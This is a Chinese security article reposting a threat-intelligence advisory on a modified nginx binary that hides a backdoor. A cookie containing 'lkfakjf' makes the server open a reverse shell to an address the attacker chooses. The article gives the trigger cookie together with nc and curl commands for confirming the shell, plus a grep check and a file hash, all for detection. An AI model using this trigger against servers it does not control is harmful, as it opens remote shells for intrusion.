警惕新型nginx后门,目前全杀毒软件免杀

华盟原创文章投稿奖励计划

原文链接:

https://ti.dbappsecurity.com.cn/informationDetail?id=947

近日,我们捕获一个新型nginx后门,该后门免杀效果非常好,截至目前VT上所有杀毒软件都不能对其进行查杀。

警惕新型nginx后门,目前全杀毒软件免杀

经过安恒威胁情报中心的研究员分析,发现黑客修改了原版nginx中处理http头的函数ngx_http_header_filter

警惕新型nginx后门,目前全杀毒软件免杀

黑客针对cookies字段进行了特殊处理,判断请求中是否包含“lkfakjf”,

警惕新型nginx后门,目前全杀毒软件免杀

如果包含,则会主动回连黑客给定的服务器地址。笔者分析逻辑后,构造了POC实现了反弹shell功能如下:

警惕新型nginx后门,目前全杀毒软件免杀

网络验证后门方法:

首先通过nc本地监听9999端口:

nc -lv 9999

接着使用curl带上特殊cookie对本地地址发起请求:

curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"

如果在监听端口得到shell,说明服务器的nginx已经被黑客替换。

本地验证后门方法:

通过grep命令判断当前运行对nginx里面是否存在"/bin/sh"可疑字符串

$ which nginx |xargs grep "/bin/sh" -la

失陷指标(IOC)

文件Hash:

文件名

文件HASH

文件类型

VT检测

家族

最后上传时间

5_6***

ab498686505dfc645e14c6edad280da7

elf

0/74

2020-07-16 10:45:26

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/262678.html

发表评论